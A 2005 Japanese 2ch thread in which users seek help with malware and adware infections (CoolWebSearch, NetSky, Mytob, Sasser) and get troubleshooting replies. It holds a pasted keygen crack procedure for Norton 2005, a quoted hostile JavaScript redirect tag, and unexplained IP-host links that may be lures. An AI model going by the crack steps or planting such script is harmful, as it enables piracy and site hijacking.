【別のオンラインスキャンしたならその結果は】
CoolWebSearch専門のソフトを使ったが、通常でもセーフモードでやってみても異常なしと判断される。
ttp://www.higaitaisaku.com/removecws.html
スパイボットでも引っかからず。
【症状を具体的に、分かる限りすべて書く】
ＨＰがCoolWebSearchになり続ける。
デスクトップが元に戻らず、真っ白のまま。コントロールパネル→画面→デスクトップには行けるが、
そこだけフリーズしたようにスクロールも何も動かない。クリックしても反応無し。
【何をしたらそんなことになったのか】
2chに貼り付けてあるURLでウイルス踏んでしまった。
【これまでにとった措置】
ノートン、スパイボット、レジストリ、HiJackThisであらかた取除いたがこれはずっと何もわからないまま。
【その他の質問】
ノートンでウイルスを発見して検疫したとき、PC内にはいるけれどウイルスは押さえられて悪さできない
状態、という解釈でいいんですか？

>>94
新型でも出たんかな>CoolWebSearch

CoolWebSearchは厄介なんだよな。アダ被で質問がいいと思う。

>>94
それどこ？
googkle？

>>94
CoolWebSearch��((ﾟДﾟ)));)

＞【WindowsUpdateしてるか】 はい
＞AntiVirusは何を使っているか】 ノートン
＞【ちゃんとUpdateしてるか】 最低でも1週間に1度
これなら、絶対に感染なんてしない。するはずないんや。
セキュリティの警告画面に、はいをクリックしなければ。

俺、CWS嫌

>>97
＞これなら、絶対に感染なんてしない。するはずないんや。

俺もそう思う。

状況を正直に正しく書かんと的を得た答えはもらえないのにな・・・

的を射た

Win XPでOE使用ですが、NetSky.d が3通来ました。
アドレスを幾つも使い分けてて、このアドレスはユーザー登録用にしか使った事がなく
知人に送信とか掲示板の書き込み等は一度もした事がありません。
登録先で感染したのかと思ってソースを見ると、発信元は同じなようです。
（送信者は詐称するそうで、3通とも違っています。）

Received: from unknown (HELO u01.itscom.net) (220.150.177.86)
by mtiichi03e with SMTP; 7 May 2005 12:15:22 +0900

Received: from unknown (HELO u01.itscom.net) (220.150.177.86)
by mtiichi06e with SMTP; 8 May 2005 11:03:33 +0900

Received: from unknown (HELO u01.itscom.net) (220.150.177.86)
by mtiichi01e with SMTP; 8 May 2005 13:45:12 +0900

の3通ですが、アドレスを登録してたのは2ヶ所だけで、どちらもitscomではないと思うんです。
（大手企業だし、登録後に来た確認メール等見ても違ってました。）
普段使う他のアドレスには出会い系やら未承諾広告が山のように来ますが
これは2ヶ所の登録時以外に使ってないので過去に一度も不審メールが届いた事はありません。

この一番下のReceived:って発信元だと思うんですが、この (HELO u01.itscom.net) って何なんでしょう？
ドメイン検索で見たら、(220.150.177.86)はitscomじゃ無かったです。
私のNetSkyが届いたアドレスが***@u01.itscom.netなのですが、発信元の所にそれが表示されてるのは
いったいどういう理由なんでしょうか？（自分が送った場合は、ここにPC名が表示されますが・・・）
登録先2ヶ所とプロバイダー以外には知り得ないアドレスなので、気になります。

＞登録先で感染したのかと思ってソースを見ると、発信元は同じなようです。
＞（送信者は詐称するそうで、3通とも違っています。）
何と何が同じで何と何が違うの？

ウイルスきてます。
社内蔓延中。

NOTICE:***YOUR EMAIL ACCOUNT WILL BE SUSPENDED***
Email Account Suspension
などの件名にzipの添付ファイル。
注意してね（ﾊｰﾄ）

>>103
来てる来てる。
アフォどもが次々と感染した模様。

http://ppp209-162.yomogi.or.jp/
ｗｗｗうはっｗｗｗｗｗｗおｋｗｗｗ

っうぇうはっｗｗｗ
ｗｗｗｗｗｗｗｗｗｗｗｗうはっｗｗｗｗおｋｗｗｗ
ｗｗｗっおｋｗｗｗｗｗｗｗｗｗっｗｗｗｗｗｗｗｗｗｗｗｗ

>>103-104
俺のところにも来たよ。

だから得体の知れないメールの添付ソフトは実行するなとあれほど(ry

俺のとこにもemail-info.exeがkitakita-

VirusScan君はまだ対応してないみたいですね...。
何するウィルスなんだろう。

>>107
トレンドのトップにある

WORM_MYTOB.EC に対して イエローアラート が発令されました
WORM_MYTOB.ED に対して イエローアラート が発令されました

これですわ。
さっきEDの方を確認。
パターン早く出せやｺﾞﾙｧ!

メールサーバとクライアントでベンダーが違うんで、サーバでうまく弾いてくれました。
まだSAVでは検出してくれないようだ。

間違って>>103のzipファイル実行しちゃった。
解凍したら.pifファイルが出てきたんだけど、
そいつはさすがに実行してない。

zipファイルを実行しただけでもマズイ？？？

>>110
それなら大丈夫。

BIGLOBEの今日(5月9日)のメール遅延はウィルスが原因だそうです。
http://support.biglobe.ne.jp/info/shogaiap/service.html

>>108
thx
うちのITアドミンに通報しますた

【使用OS】 WinMX
【WindowsUpdateしてるか】 している
【AntiVirusは何を使っているか】 共有ソフト
【ちゃんとUpdateしてるか】 している
【スキャンした結果（ウイルス名・発見場所）】 ANTINNY.A
【別のオンラインスキャンしたならその結果は】 上に同じ
【症状を具体的に、分かる限りすべて書く】 起動すると終了する
【何をしたらそんなことになったのか】 何もやっていません
【これまでにとった措置】 スキャン
【その他の質問】 nyやっていません。信じてください。
そして助けて下さい。

>>114
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_ANTINNY.A

>>114
http://pc8.2ch.net/test/read.cgi/sec/1113654596/913
http://pc8.2ch.net/test/read.cgi/pcqa/1115237587/273

> 【使用OS】 WinMX
ﾜﾛｽ

ウイルス対策ソフトをNortonからavastというソフトにしたいんですが、
その場合、Norton関連のプログラムは完全にアンインスト−ルしなきゃいけないんですよね？
あと、Norton　Gobackというプログラムがあるんですが
(非常にアンインストールの時間が長そうなのだ途中で断念)
やはりavastを機能させるには、ちゃんと削除した方が良いんですかね？
スレ違いだったらスマソ

>>118
クリーンインスコした方が良いと思われ。
ノートンはアンインストールがメンドイらしい。

>>118
アンインストールのしかた
【ﾉｰﾄﾝ】ｲﾝﾀｰﾈｯﾄｾｷｭﾘﾃｨ Ver.64【2005】
http://pc8.2ch.net/test/read.cgi/sec/1114417257/20

あとGobackってバックアップソフトでしょ。それは、そのままで
いいと思うのだが。俺も買おうかと今思案中ｗ

>>119
すみません、クリーンインスコってどういう意味ですか？

>>120
自分もGobackは消さなくても良いかなって思うんですが…
Gobackってどんな内容なのか判らないから

Mytobが少しずつ増えてるような気がする。
会社や大学からが多いのは、
こいつは簡単なパスワードで共有にログオンを試みるせいかな？

トレンド早くパターン出しやがれｺﾞﾙｧ
帰れないじゃねーか。
不祥事起こしたからって死ぬほど検証してんじゃねーだろーな（怒

>>123
McAfee も(ry

>>123-124
ほんとに遅い。

１社じゃ怖いので、２社体制にしたのだが・・・

トレンドもマカフィーも出ないのは、想定外!!

>>125
Symantec も出てない模様。
出たのは、 Sophos だけのような気がする。

>>126
トレンド早くパターン出しやがれｺﾞﾙｧ
マカフィー早くｄａｔを出しやがれｺﾞﾙｧ

どっちかが出れば、帰れるんだよ。

非公式に21時頃と聞いてたので試してみたら（コーポレートエディション）、
HTTP接続エラーって出やがる（怒

と思ったら出たぞ（怒

>>129
うん？トレンドの話？

>>130
そうそうトレンド。
でもオレんとこに来たウイルスには反応しないなー。

メール転送しようとしたら反応した。
トレンドマイクロ、パターン2.619.00です。
これで帰れる。

McAfee マダー？

3,4年位前の話です、ほとんどＰＣの知識のない頃でした
WinMEでアンチウィルス対策なしの状態でとあるエロサイトを見たあとに不具合発声

数分は何も起きないのですが、数分たつとデリートを押してるような状態になり
入力文字やエクスプローラーを開いてるとファイルがデリートされていくといった症状がありました

メーカーPCだったので修理に出しリカバリーしてもらったら直っていました

今思うとウィルスかスパイウェアだったのかなと思いますが
このような挙動をするウィルスに心当たりあるかたいますでしょうか？

なにぶん知識のない頃だったので情報が少なくて申し訳ないです

>>102
送信者名は偽装されているので別名だけど
送信サーバーが同じ所から発信されていると言う事です。

どなたか>>101の (HELO u01.itscom.net) (220.150.177.86)
の説明をよろしくお願いいたします。

>>101>>135
感染PCがSMTP(送信)サーバであるmtiichi01eに接続した際に、
HELO 自分のホスト名
という形式で名乗ることになっている。
この時に、NETSKYに感染した端末は、SMTPサーバのネットワーク
を名乗って接続を試みる。

今回の場合は、
HELO u01.itscom.net
と名乗って接続したが、実際にはitscomのユーザではなく、
(220.150.177.86)が感染者(接続しているIPアドレス)である。

http://www2.arearesearch.co.jp/ip-kekka.php
↑などで検索すれば判るが、220.150.177.86はフリービット
のIPアドレスなので、フリービットのユーザが何らかの原因で
NETSKYに感染し、itscomのユーザを装ってitscomのSMTPサーバ
に接続してメールを送信したが、メールヘッダにはHELOで名乗
ったホスト名と実際の接続IPアドレスが記録されている訳。

メールアドレスが判った理由は、様々であるが、一般的には
感染者のPCに登録されているアドレス帳やインターネットの
キャッシュに残っているメールアドレス、テキストやCSV形式
のファイル等から収集したメールアドレスを、送信者名、及び
宛先メールアドレスに使うようになっている。

あるいは、ランダムにアカウント名を生成してメールを送信
する場合もあるので、何故かという問いには確実な答えは難しい。

何故か最近Windowsを起動した直後にIEがv5.webnetsecure.comにアクセスしています。
タスクマネージャーを見ていて"IEXPLORE.EXE"がIEを起動してないのに勝手に起動していて変だと思い、
アクセス先を監視してみたらどうも上記のURLに勝手に繋がっているようです。
タスクマネージャーでIEXPLORE.EXEを強制終了させてもまた時間がたつと勝手に起動します。
関係はないかもしれませんが、起動直後に勝手にマイドキュメントが開くようにもなりました。
これは何かのウィルスなのでしょうか？
当方WinXP Pro SP1を使用しております。

ウイルスだろうね。スキャンしてよ。

ごめんなさい、テンプレちゃんと読んでませんでした。

【使用OS】
WinXP Pro SP1
【WindowsUpdateしてるか】
しています
【AntiVirusは何を使っているか】
NOD32
【ちゃんとUpdateしてるか】
自動でアップデートしているようです
【スキャンした結果（ウイルス名・発見場所）】
何も検出しませんでした。
【別のオンラインスキャンしたならその結果は】
まだしておりません
【症状を具体的に、分かる限りすべて書く】　上にも書きましたが
何故か最近Windowsを起動した直後にIEがv5.webnetsecure.comにアクセスしています。
タスクマネージャーを見ていて"IEXPLORE.EXE"がIEを起動してないのに勝手に起動していて変だと思い、
アクセス先を監視してみたらどうも上記のURLに勝手に繋がっているようです。
タスクマネージャーでIEXPLORE.EXEを強制終了させてもまた時間がたつと勝手に起動します。
関係はないかもしれませんが、起動直後に勝手にマイドキュメントが開くようにもなりました。
【何をしたらそんなことになったのか】
海外のサイトに行ったときにポップアップがやたら出てきたのが原因だと思います。
【これまでにとった措置】
ウィルススキャン、v5.webnetsecure.comへのアクセスの遮断
【その他の質問】
よろしくお願いいたします。

dlmax.dll
localNRD.dll
NDNuninstall6_38.exe
preInsln.exe
ATPartners.dll
ezt3.exe
megaV2Wbr.dll
sahagent1019.exe
setup_incred_2.exe
Splpmt.dll
WebRebates_Auto_InstallSilent.exe
winup.exe
Unix.Penguin
VBS.Network.E
この中で、削除しても(･∀･)ｲｲ!!のと(･Ａ･)ｲｸﾅｲ!!のと(ﾟεﾟ)ｷﾆｼﾅｲ!!
のを教えてください。(ezt3.exeとsetup_incred_2.exeについては何の情報も無かったです)

>>140
情報のないのはウィルスが適当につけた名前のものが多い

URLにMP3と書かれてあるファイルは、ダウンロードしても
ウィルスの心配は無いのでしょうか？

今だいたい調べてきましたが
dlmax.dll　(･∀･)ｲｲ!
localNRD.dl　(･∀･)ｲｲ!l
NDNuninstall6_38.exe　(･∀･)ｲｲ!
preInsln.exe　(ﾟεﾟ)ｷﾆｼﾅｲ!!
ATPartners.dll　(･∀･)ｲｲ!
ezt3.exe　(･∀･)ｲｲ!
megaV2Wbr.dll　(･∀･)ｲｲ!
sahagent1019.exe　(･∀･)ｲｲ!
setup_incred_2.exe　(･∀･)ｲｲ!
Splpmt.dll　(･∀･)ｲｲ!
WebRebates_Auto_InstallSilent.exe　(･∀･)ｲｲ!
winup.exe　(ﾟεﾟ)ｷﾆｼﾅｲ!!
Unix.Penguin　(ﾟεﾟ)ｷﾆｼﾅｲ!!
VBS.Network.E 　(ﾟεﾟ)ｷﾆｼﾅｲ!!
でいいんでしょうか？

すみません質問させてください。
ホームページが401MPV Warningというのになってしまい、変えることができません。
おそらく、海外アダルトサイトからのものだと思われます・・・
どなたかご存知の方いませんか？やっぱりリカバリーしないとだめなのかな・・？

>>144
板違い。
PC初心者板http://pc8.2ch.net/pcqa/
エロサイト見たら…助けて下さい！Part54
http://pc8.2ch.net/test/read.cgi/pcqa/1115237587/l50へ

>>139
これ参考に、まずはスタートアップの内容調べてみたら？

いらない常駐ソフトを減らし、起動を速くする。
ttp://www003.upp.so-net.ne.jp/shigeri/speedup/speedup1.html

>>105
こういうの最近よく見るけど何?

>>137
砂箱入れれ

助けてくれ
初心者だからわからん
【使用OS】 windows ny(略してwinny）
【WindowsUpdateしてるか】 何それ？
【AntiVirusは何を使っているか】 初心者だからわからん
【ちゃんとUpdateしてるか】 さあ？
【スキャンした結果（ウイルス名・発見場所）】 何もわからん
【別のオンラインスキャンしたならその結果は】 何も知らん
【症状を具体的に、分かる限りすべて書く】 共有ソフト使用中に不安定に
【何をしたらそんなことになったのか】 windows mxからwindows nyにグレードアップ
【これまでにとった措置】 EXEの実行
【その他の質問】 winnyもやっていない。何もやっていない。本当です。
信じてください。助けて下さい。お願いします。

つまんねぇ

すみませんが教えてください。ウイルスに感染してしまって、
もっとも最悪なケースはどうなってしまうことなんですか？
いろいろあると思いますけど、教えてください。

>>151
PCが使いものにならなくなる。
個人情報などが流れて、現在の地位・財産などが失われる。

>>152
ありがとうございました。あとよくＯＳを再インストしろって
書いていますがそのメリットとデメリットを教えてください。

>>136
なるほど・・・(220.150.177.86)からの送信でもホスト名は接続SMTP名に
偽装？されてるって事なんですね。
私のPCは感染してないのは確実なのに、アドレスと同じドメインが出てたので
何だよー、これは？と気になってました。
itscomで無料のウィルスチェックが有るので元のサーバーから削除だと思ってたら
今回調べてみると、無料でもアドレス毎に申し込まないとチェックされないものだったので
早速申し込んでおきました。

通常使っている他のアドレスは数字も混ぜた複雑なアカウント名にしてますが
これはごく簡単で短い英単語だけなので、ランダムに送信された可能性が高いかと思います。

ウィルスはムカつくけど、謎が解けてちょっとはスッキリしました。
どうもありがとうございました！

>>153
メリット：きれいな環境を再び整えることだできる
デメリット：大事なファイルも全て消えてしまう上にひたすら面倒くさい

【使用OS】 Windows XP
【WindowsUpdateしてるか】 しています
【AntiVirusは何を使っているか】 マカフィー　ウィルススキャン
【ちゃんとUpdateしてるか】 自動アップデートしています
【スキャンした結果（ウイルス名・発見場所）】 何も
【別のオンラインスキャンしたならその結果は】
シマンテックでスキャンしたところ、
Adware.SAHAgent、W32.Sasser.Worm、Adware.180Search、Adware.MediaPass 、
Download.Trojanなどに感染したファイルを11個見つけました
【症状を具体的に、分かる限りすべて書く】
いきなりパソコンが異常に重くなったのでスキャンしてみました
【これまでにとった措置】
ウィルスの情報のページを見ながら駆除しようとしています
【その他の質問】
ウィルスの情報のページを見ていると感染しているファイルを全て削除しろと
書いていますが、70tovmto.exe、system32/2b3fsk0h.dll、system32/bln02nqv.exe、
system32/cmd.ftp、gah95on6.exe、temp/salmhook.dll、Media Access/MediaAccC.dll、
Media Access/MediaAccess.exe、Media Access/MediaAccK.exe、Internet Explorer/cgqqrfge.exe、
Internet Explorer/ua.exe
などのファイルは削除してしまっても問題のないものなのでしょうか？
マカフィーが最近正式に作動しないので、近いうちにノートンを買ってくる予定ですが、
そういったソフトを使って駆除してもらうべきですか？
お願いします

>156
それぞれのファイル名でググッてみれば、大体見当がつきますよ。

>>156
マカフィーで検出できなかったというのがスゴイ。

>>155
ありがとうございます。それは買ってきた時の初期状態に
戻るということですか？それと再インストすればもうウイルス
は完全になくなるのですか？

>>156
マカフィーって凄いんだなｗ
saseerに感染してるのに、再起動繰り返してないんか？

＞W32.Sasser.Worm
これはシマンテックで駆除ツール落として駆除

AdwareはAd-Aware使って駆除

で、後まだおかしかったら↓のスレのテンプレ全部実行のち質問

エロサイト見たら…助けて下さい！Part54
http://pc8.2ch.net/test/read.cgi/pcqa/1115237587/

みなさんどうもありがとうございます！
昔saseerを見つけてきて、駆除→失敗、削除→失敗
という流れになったことはあります。
マカフィーはどのウィルス見つけてもこうなるんですが、
これって何の解決にもなってなかったんでしょうか…。
SasserとAdwareは駆除できそうですが他はどうすればいいのかわかりません。
一つ一つ検索かけてみます。

>>156
親玉がいるからソフトで自動駆除出来ねえよ
初心者はリカバリー
それか、駆除、復活のループ地獄

>>159
そう考えて差し支えない。

>>156
漏れもリカバリーに1票。
自分でひとつひとつ駆除して勉強したいと言うならそれもいいと思うけど。

すいません、
>>142
の質問、わかる方おねがいしまつ。

>>164
絶対無いとは言えない。

>>165
即レスありがとうございます。mp3のファイルはダウンロード
する時にノートンスキャンできないみたいなので、大丈夫なのかと
思ってました。ありがとうございました！

mp3のファイルにウィルスってどうやって組み込めるの？

>>167
単に拡張子をmp3に変えるだけでは？

>>167
・URL偽装でMP3ファイルに見せ掛けてダウソさせる。
・メジャーな音楽再生ソフトの脆弱性を利用する（別の不正プログラムと組み合わせて使う）
等も考えられるが。

質問です
XPを使っていて、最近ネットに繋ぐようになりました。
インターネットに繋ぐと、何分かすると、｢シャトダウんしま｣す。
と表示され、再起動されてしまいます。
だいぶ前にはやったウィルスみたいなんですが、対処法が解りません助けてください。

変わった表示ですね。初めて見ましたよ。＞「シャトダウんしま」す。

>>170
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MSBLAST.A

【使用OS】 WindowsMe
【WindowsUpdateしてるか】 しています
【AntiVirusは何を使っているか】 ウイルスバスター2005
【ちゃんとUpdateしてるか】 しています
【スキャンした結果（ウイルス名・発見場所）】 Adware.SAHAgent Adware.180Search 
Adware.MediaPass Trojan.ByteVerify
【別のオンラインスキャンしたならその結果は】 シマンテック　ウイルスバスター（どちらもオンライン）
【症状を具体的に、分かる限りすべて書く】 昨日シマンテックのウイルススキャンをしたところ
上記のウイルスが発見されました。その後ウイルスバスターで再度スキャンしたところ
発見されませんでした。このような場合はどうすればいいのでしょうか？
ご存知の方教えてください
【何をしたらそんなことになったのか】 ネットでゲームや検索等
【これまでにとった措置】 
【その他の質問】 

>>173
最初のスキャンでウイルス駆除したのなら後のスキャンで発見されなくてもnp

>>174
最初のスキャンはシマンテックのオンラインスキャン（スキャンのみで駆除はできず・・・）
だったのでウイルスを発見しウイルスバスターで駆除しようとしても
そのウイルスは発見されませんでした。

この場合はウイルスバスターがまだそのウイルスに対応していないということでしょうか？
ということはこのまま駆除できず・・・ってことでしょうか・・・
ご存知の方教えてくださいm(__)m

>>175
よく似たもん拾ってるよな、>>156かとｵﾓﾀ
>>160読め

うちのﾏｸが起動すると画面にPANICPANIC…といっぱい出るらしい。よくわからんがウィルスかなぁ。

ノートンで「侵入の試みを検出して遮断しました。」という警告が出ました。
これは通報した方がいいのでしょうか？

>>178
ほっとけ。ウィルスが勝手に飛んできてることがほとんど。犯罪に当たらず。

>>178
そんなんあるのか。60へぇ。

TROJ_AGENT.ABS
っていうウイルスが定期的にリアルタイムで検出されて隔離されます。
ウイルスバスター２００５です。OSはXPです。
アングラなサイト探検してたらブラウザ開きまくって、いくつかウイルスにかかって他は削除・隔離されたんですが
それだけは未だに続いてます。ウイルス検索してもひっかからないのに
それ以来普通のサイト見てても定期的にリアルタイム検出されます。広告ページも時々勝手に出ます。
ファイル名C￥WINDOWS\System\32poller.exeになってます。削除してもしても同じものが出てきます。
どうすればよいでしょうか。

ウィルスかどうかわからないんですが、
C:\WINDOWS\system32 に update5440791.log という名前の10ギガのテキストファイルができています。
削除しても数分後に再びできていて消えません。
ウィルスバスターでチェックをしても何も見つからないのでどうしたらいいかわかりません。
どのたか教えてください。よろしくお願いします。

ウイルスというか、トロイ？みたいです。よくわかりません。
どうすれば良いかお願いします。

>>181
OS再インスコ
アングラ出入りするの10年早いかもよ

ノートンの割れソフトを手に入れました。使い方が英語でよくわかりません。
詳しく教えてください。

tmg-nav2k5.exe
1.Open the crack using winrar.
2.dowble click on tmg-nav2k5.exe
3.click on generate. It will generate the Cd key paste the cd key wen u install NAV 2005
4. Install Nav2005
5. Click on acitvate the software. Make sure u disconnect from the internet.
　 Pull out any cable or phone wires from the COM.. or in simple words " DISCONNECT FROM THE INTERNET"
6. NAV will try to connect to connect to its severs. click next until u get the activate software by phone diaolog.
7. Enter the fone reg code into the keygen. n click generate.
　it will generate the reg code. Paste it on the NAV 2005. It is now a full version

Enjoy ..

まじですか。
これはいったいどこから来るんでしょか・・
絶対再インスコしないと無理ですか

>>186
あなたの愚かな行為から来ていると思います。

そうですけど再インスコ以外に方法ないですか？

>>188
ありますが、自力で調べられないようなら、再インストールが確実で早いです。

>>181
室濃い　死ね

トロイのソフトとかですか？

Swat　ITってアンチトロイですか？

googkleに感染してしまったみたいです…
ワクチン、または対処法教えてください
お願いします。

こんにちは
WEBサイトで自分のメルアドを公開している者ですが　最近こういうメールがくるようになりました

件名　failure notice
宛先　MAILER-DAEMON@****.co.jp

Hi. This is the qmail-send program at jip.co.jp.
I'm afraid I wasn't able to deliver your message to the following addresses.
This is a permanent error; I've given up. Sorry it didn't work out.

<****@****.co.jp>:
Sorry, I couldn't find any host named ******.co.jp. (#5.1.2)
--- Below this line is a copy of the message.

このあと　

TVqQAAMAAAAEAAAA//8AALgAAAA　といった文字が大量に入っています。

****@****.co.jp　の人にメールを出したことはないので、MAILER-DAEMONで帰ってくることはありえないのですが
これは****@****.co.jp　の人がウイルスに感染しているということでしょうか？　該当するウイルスがあったら教えてください。

【使用OS】 XPSP２
【WindowsUpdateしてるか】 している
【AntiVirusは何を使っているか】 ウィルスセキュリティ
【ちゃんとUpdateしてるか】 している
【スキャンした結果（ウイルス名・発見場所）】 全ファイルスキャンしたけど検出されず　同名ファイルは発見した。
【別のオンラインスキャンしたならその結果は】 シマンテックのオンラインスキャンでは検出されず。
【症状を具体的に、分かる限りすべて書く】tcpsvcs.exeというプロセスが起動直後からCPUを１００％使用して、重くなる。不審な通信は行われていない模様（通信ランプを見る限り。）
【何をしたらそんなことになったのか】 気がついたらなっていた
【これまでにとった措置】 タスクマネージャのプロセスの終了で終わらせていた。ファイルの方も削除してみたがすぐに復活している。

>>193
「googkleに感染する」という表現は間違ってる気がするが・・。
とりあえずスキャン。

【その他の質問】 tcpsvcs.exeで検索したところシマンテックのスパイウェアの頁でレジストリをいじられてたら消すように、と書いてありましたが
初心者なのでやり方がわからないのと間違っていじってしまわないかと不安です。
それとウィルスセキュリティの更新が実家の親のPCで使っていたノートンに比べてとても少なく不安です。

>>181
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_AGENT.ABS
手順どおりにやってみて。

ウィルスが検出されたっぽいです。

【使用OS】 XPSP２
【WindowsUpdateしてるか】 しています
【AntiVirusは何を使っているか】 ウィルスバスター2005無料版
【ちゃんとUpdateしてるか】 しています
【スキャンした結果（ウイルス名・発見場所）】 全ファイルスキャン
【別のオンラインスキャンしたならその結果は】 シマンテックのオンラインスキャンで９つ検出…
　　　　　　　　　　　　　　　　　　　　　　　　　　　ウィルスバスターなら何も検出されませんでした。



C:\Documents and Settings\●●●●（←名前）\Local Settings\Temporary Internet Files\Content.IE5\M1SBQXU5\comic[1].htm は　Unix.Penguin に感染しています。
C:\Documents and Settings\●●●●\Local Settings\Temporary Internet Files\Content.IE5\8RVFISPH\l100[5].htm は　Unix.Penguin に感染しています。
C:\Documents and Settings\●●●●\Application Data\katjusha\log\pc8.2ch.net\sec\1114223469.dat は　VBS.LoveLetter.A に感染しています。
C:\Documents and Settings\●●●●\Application Data\katjusha\log\pc8.2ch.net\sec\1114249250.dat は　VBS.LoveLetter.A に感染しています。
C:\Documents and Settings\●●●●\Application Data\katjusha\log\pc8.2ch.net\pcqa\1112493137.dat は　Unix.Penguin に感染しています。
C:\Documents and Settings\●●●●\Application Data\katjusha\log\etc4.2ch.net\wcomic\1112697839.dat は　Unix.Penguin に感染しています。
C:\Documents and Settings\●●●●\Application Data\katjusha\log\etc4.2ch.net\wcomic\1113139376.dat は　Unix.Penguin に感染しています。
C:\Documents and Settings\●●●●\Application Data\katjusha\log\etc4.2ch.net\wcomic\1114712291.dat は　Unix.Penguin に感染しています。
C:\Documents and Settings\●●●●\Application Data\katjusha\log\etc4.2ch.net\wcomic\1115736810.dat は　Unix.Penguin に感染しています。

どこから何を消せばよいのでしょうか…？

>>199
誤検出。心配なし。
気になるなら、インターネット一時ファイルを削除する。

>>200
これが噂に聞く語検出でしたか。
びっくりしました…
ありがとうございました。安心しました。

>199
インターネットオプションで一時ファイルを削除
後は放置で問題なし

>>202
それもやってみます。
どうもありがとうございました。

>>203
いや・・一緒やん

http://p2176-ipad06hiraide.tochigi.ocn.ne.jp/

ｗｗｗｗｗｗｗｗｗｗｗｗっうぇｗｗｗｗｗｗｗｗｗｗｗｗ
ｗおｋｗｗｗうはっｗｗｗっおｋｗｗｗっうぇ
っうぇｗｗｗｗｗｗｗｗｗｗｗｗうはっｗｗｗｗｗｗｗｗｗｗ

>>204
いや、一応答えていただいたのでお礼を言わなければなぁ、と思ったもので…
紛らわしくてすみません。

>>194
宛先がMAILER-DAEMON@****.co.jpなのか？
送信者がMAILER-DAEMON@****.co.jpじゃなくて？

>>194

ｽﾏｿ先走った・・。

>>194
どっちにしろその手のメールは削除した方がいいと思うぞ。

【使用OS】WindowsXP Home SP2
【WindowsUpdateしてるか】している
【AntiVirusは何を使っているか】ウィルスバスター
【ちゃんとUpdateしてるか】している
【スキャンした結果（ウイルス名・発見場所）】見つからず
【症状を具体的に、分かる限りすべて書く】C:\WINDOWS\system32 に update5440791.log という名前の10GBのテキストファイルができる
　　　　　　　　　　　　　　　　　　　　　　　　　 削除しても数分後にまた作成されている。
【何をしたらそんなことになったのか】ダウンロードしたなにかのexeを実行したかも。
【これまでにとった措置】削除→作成→削除→･･･のいたちごっこ
【その他の質問】

>>210
ny使いの可能性が高い希ガス

>>211
jpg作るやつはノートンが対応してるみたいだけど、logのはどうなったのかね〜？
って、なんで俺はこんなこと知ってんだｗ

当方XPで今日NETSKYに感染しちゃったんですが
ウィルスバスターで駆除しても重いままです
これってリカバリするしかないんですかね？

>>213
他に原因があるのでは？

198 名前： みうなぎφ ★ [sage] 投稿日： 2005/05/12(木) 21:26:53 ID:???
〜2chをIE等で見ていると127.0.0.1に飛ばされる件について〜 
　現在2chのほぼ全域(2chトップ・スレ一覧)に埋め込まれているlivedoorのブログ(以下乙部ブログ)に 
　　<script type="text/javascript" language="JavaScript">w=window;if(w.parent != w.self) { w.parent.location = 'http://127.0.0.1/'; }</script><br /> 
　というタグが埋め込まれているため、自動的に127.0.0.1に飛ばされるようになっています。 
　この問題はjavascriptを切る事によって仮解決します 
　また、127.0.0.1に飛ばされた時にハードディスク内のファイルが表示される場合、 
　山田ウィルスに感染している恐れがあるので確認してみてください。 

なんで2ch行く時にjavascript入れてるやつがいるんだ？
必要ないじゃん。

とりあえずやってみます。ありがとうございます。

http://pc8.2ch.net/test/read.cgi/sec/1114827665/
↑にも書きましたものです。

negativebeats.comってとこでmp3をダウンロードしようとしたら 、
yoursitebarってウィルスらしきものが…。ポップアップが毎日出ます。
ノートン2003を更新しててもダメです。

助けてください。。

>>218
スパイウェアは調べた？

>>218
yoursitebarでぐぐったら色々出てきたけど
ttp://www.shareedge.com/spywareguide/product_show.php?id=974
>>219の言うとおり、スパイウェアだね

どこで質問してよいのかわからないので力になってくれる方いたらお願いします。

ここ1週間ほどPCを立ち上げると何も上げていないうちに小さいウィンドウでIEが立ち上がり
サーバが見つかりませんと出ます。
その後普通にIE立ち上げると別ウィンドウで海外のポルノサイトが3つくらい開くのですが
どう対処したらいいでしょうか？

今まで何かあると嫌なのでこのPCでアダルトサイトなどは見たことはなく、nyやシェアも
やってないのですが、たまに様子を見つつ（他の人の反応見つつ）2chなどでzipやmp3ファイル
はダウンロードしたことはあります。

あと、スパムメールがものすごく来るのも関係あるのでしょうか？（3日ほっとくと300件以上たまってます）
ノートンを何度かかけているのですが特に何も引っかからないのです・・。

>>221
君もスパイウェア検索してみようか

ありがとうございます
セキュリティ板にAd-AwareSE用のスレッドあるんですけど、なんか空気が変なのでこっちで
質問します。
Ad-AwareSEをDLしてスキャンかけたのですが終了時のファイルが
141/141objectsもあるんですが、とりあえず全部チェック入れて消去しちゃっておｋでしょうか？

ここはウィルススレだっつーの馬鹿

>>223
141個っつっても多分、ほとんどがMRUじゃないかな
Regseekerじゃあるまいし、全消しでも無問題

全部消していいでしょうかって。
その中に良くないのがふくまれてる可能性も
皆無ではないことくらいはわかるよな？

そもそもそんな相談の仕方されても
あんたのスキャン結果に何が出てるかこちらはわからないので。

まあ大抵どうってことないけど、それぞれを興味を持ってみる習慣を持たないと、
いつまで経っても知識のレベルが上がりませんよ。何ごとも。

今まで一緒にいた人たちがエンジニアやらプログラマやらで
無知のままホイホイPCもらってたので・・
いかに自分が無防備だかわかりました。
勉強します、みなさんありがとう。

今までVB使ってたけど、先日の騒ぎでﾉｰﾄﾝに乗り換えようかと
体験版を試してるんですが、間違えてギコを｢常に遮断｣って
やっちゃいました
どうしたら元に戻せるかどうしてもわかりません
どなたか教えていただけませんか？

>218
>219
ありがとうございます。スパイウェアらしいですね。
教えていただいたX-Cleanerで除去してみます。

>>228
ファイヤーウォール → プログラム制御でギコを常に許可に汁。製品のヘルプも参照。

>>230
おかげで無事解決出来ました
ありがとうございました



関係無いけどﾉｰﾄﾝて重いですね

>>231
重いなりの仕事はやってる。
常駐アプリやサービスをできるだけ減らすとかして工夫する。

>>232
なるほど、そういう考え方もｱﾘっすね<<重いなりの仕事

とりあえず試用期間目一杯使って見極めます

携帯から失礼します。
今まで、windowsにログインするときには
あえてパスワードを設定していなかったのですが、
今朝立ち上げようとしたらパスワード要求の画面になりました。

パスワードのヒントはpetとなっており、
全く覚えがありません。

13日の金曜日なので、
今日発病にプログラムされたウィルスか何かかと
思ったのですが、
ログインできないためネットに繋ぐこともできず、
調べられません…

どなたか調べて頂けないでしょうか。
また、同じ症状の方はいらっしゃいませんか？

>>234
